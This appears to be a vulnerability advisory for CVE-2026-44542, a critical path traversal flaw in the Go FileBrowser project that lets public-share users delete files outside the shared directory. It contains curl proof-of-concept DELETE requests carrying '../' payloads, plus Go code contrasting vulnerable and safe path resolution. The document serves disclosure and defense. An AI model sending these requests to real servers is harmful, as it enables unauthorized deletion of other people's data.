PT-2026-38413 · Go · github.com/gtsteffaniak/filebrowser

Published

2026-05-07

·

Updated

2026-05-07

·

CVE-2026-44542

CVSS v3.1

9.1

Critical

Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Summary

Attacker-controlled path input is joined with the trusted base path of the share before it is sanitized, so traversal sequences (e.g. ../) are resolved against the base path itself and escape the intended shared directory. As a result, an unauthenticated attacker who holds a valid public share hash for a share with delete permissions enabled can delete arbitrary files outside the shared directory, anywhere within the share owner's configured storage scope.

Affected Components

Two distinct vulnerable code paths:
  1. Stable versions (e.g., gtstef/filebrowser:stable)
     Request: DELETE /public/api/resources?hash=<hash>&path=../victim
     Root cause: middleware.go:111
     Issue: the path query parameter is joined before SanitizeUserPath()
  2. Development / HEAD (e.g., commit eabdfd9)
     Request: DELETE /public/api/resources/bulk?hash=<hash>
     Body: [{"path":"../victim"}]
     Root cause: resource.go:274
     Issue: item.Path is joined before SanitizeUserPath()
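The ordering mistake shared by both code paths, shown as an added illustration rather than FileBrowser's own code: sanitizeUserPath, resolveVulnerable, resolveSafe and isInsideRoot are hypothetical names, and the stand-in sanitizer only models a generic clean-and-strip step, not the project's SanitizeUserPath(). The "vulnerable" resolver joins the attacker-controlled path with the share root first, so path.Join (which cleans) applies the ../ against the root; the "safe" resolver cleans the untrusted component on its own, joins it under the root, and then re-checks containment. The bulk endpoint differs only in that the same resolution is applied once per item in the JSON body.

```go
package main

import (
	"errors"
	"fmt"
	"path"
	"strings"
)

// ErrOutsideShare is returned when a resolved path lands outside the share root.
var ErrOutsideShare = errors.New("resolved path escapes the shared directory")

// sanitizeUserPath is a hypothetical stand-in for a "clean the user-supplied
// path" step (not FileBrowser's SanitizeUserPath). Cleaning with a leading "/"
// resolves any ".." against "/" (which cannot go higher), then the slash is
// stripped so the result is a relative path that can be joined under a root.
func sanitizeUserPath(p string) string {
	cleaned := path.Clean("/" + p)
	return strings.TrimPrefix(cleaned, "/")
}

// resolveVulnerable mirrors the flawed order described in the advisory: the
// untrusted path is joined with the trusted share root first. path.Join cleans
// the combined string, so "../x" walks out of the root instead of being neutralised.
func resolveVulnerable(shareRoot, userPath string) string {
	return path.Join(shareRoot, userPath)
}

// isInsideRoot reports whether full is root itself or a descendant of it.
// The root+"/" comparison avoids the classic prefix bug where "/folder/shared"
// would wrongly accept "/folder/shared2/x".
func isInsideRoot(root, full string) bool {
	root = path.Clean("/" + root)
	full = path.Clean("/" + full)
	if root == "/" {
		return true
	}
	return full == root || strings.HasPrefix(full, root+"/")
}

// resolveSafe sanitizes the untrusted component before joining, then verifies
// the result is still contained in the root. The containment check is defence in
// depth: it would catch a future regression in the sanitizer.
func resolveSafe(shareRoot, userPath string) (string, error) {
	root := path.Clean("/" + shareRoot)
	full := path.Join(root, sanitizeUserPath(userPath))
	if !isInsideRoot(root, full) {
		return "", ErrOutsideShare
	}
	return full, nil
}

func main() {
	// Layout from the advisory's reproduction steps (constructed sample input).
	const shareRoot = "/folder/shared subdir"
	for _, p := range []string{"notes.txt", "../protected.txt", "sub/../../../protected.txt"} {
		fmt.Printf("vulnerable: %-28q -> %q\n", p, resolveVulnerable(shareRoot, p))
		safe, err := resolveSafe(shareRoot, p)
		fmt.Printf("safe:       %-28q -> %q (err=%v)\n", p, safe, err)
	}
}
```

Run with `go run .`: the vulnerable resolver turns "../protected.txt" into "/folder/protected.txt", the exact file outside the share that the advisory deletes, while the safe resolver keeps every input pinned under "/folder/shared subdir". Clamping (treating "../protected.txt" as "protected.txt" inside the share) is one valid policy; rejecting any request whose sanitized form differs from the raw input is the stricter alternative and is a one-line change in resolveSafe.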

Steps to reproduce (Stable Version)

1. Create a directory structure:
   /folder/shared subdir/   (shared)
   /folder/protected.txt    (outside the shared directory)
2. Create a public share:
   Path: /shared subdir
   AllowDelete=true
3. Send the request:
   curl -X DELETE "http://localhost/public/api/resources?hash=<HASH>&path=../protected.txt"

Observe: protected.txt is deleted despite being outside the shared directory.

Proof of Concept (HEAD / bulk endpoint)

curl -X DELETE "http://localhost/public/api/resources/bulk?hash=<HASH>" \
  -H "Content-Type: application/json" \
  -d '[{"path":"../protected.txt"}]'

Alternative PoC script:

[poc v3.sh](https://github.com/user-attachments/files/26159404/poc v3.sh) (If the script fails due to environment differences, the manual PoC above reliably reproduces the issue.)

Impact

An unauthenticated attacker who has the link to a public share configured with delete permissions can delete attacker-chosen files outside the shared directory, anywhere within the share owner's storage scope. This results in unauthorized data loss and potential service disruption; confidentiality is not affected, which matches the C:N in the vector above.

Fix

Weakness Enumeration

Path traversal

Related Identifiers

CVE-2026-44542
GHSA-fwj3-42wh-8673

Affected Products

github.com/gtsteffaniak/filebrowser